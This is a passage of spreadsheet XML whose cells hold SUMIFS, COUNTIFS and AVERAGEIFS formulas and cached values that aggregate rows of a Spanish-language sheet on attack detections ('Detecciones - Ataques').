        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.001315789474</v>
      </c>
      <c r="V148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="W148" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Y148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Z148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.08386775763</v>
      </c>
      <c r="AA148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AB148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.125</v>
      </c>
      <c r="AC148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.1</v>
      </c>
      <c r="AD148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AE148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AF148" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.01</v>
      </c>
      <c r="AG148" s="271"/>
      <c r="AH148" s="352" t="s">
        <v>2570</v>
      </c>
      <c r="AI148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AR148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0</v>
      </c>
      <c r="AS148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0</v>
      </c>
      <c r="AV148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0</v>
      </c>
      <c r="AY148" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB148" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="BD148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="BN148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0</v>
      </c>
      <c r="BO148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="BZ148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA148" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC148" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="CI148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0</v>
      </c>
      <c r="CQ148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0</v>
      </c>
      <c r="CU148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH148" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI148" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ148" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0</v>
      </c>
      <c r="DK148" s="271"/>
    </row>
    <row r="149">
      <c r="J149" s="277"/>
      <c r="K149" s="512"/>
      <c r="L149" s="512"/>
      <c r="M149" s="512"/>
      <c r="N149" s="512"/>
      <c r="O149" s="278"/>
      <c r="Q149" s="271"/>
      <c r="R149" s="352" t="s">
        <v>2571</v>
      </c>
      <c r="S149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1685275081</v>
      </c>
      <c r="T149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.3736842105</v>
      </c>
      <c r="V149" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W149" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DG$3:$DG$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
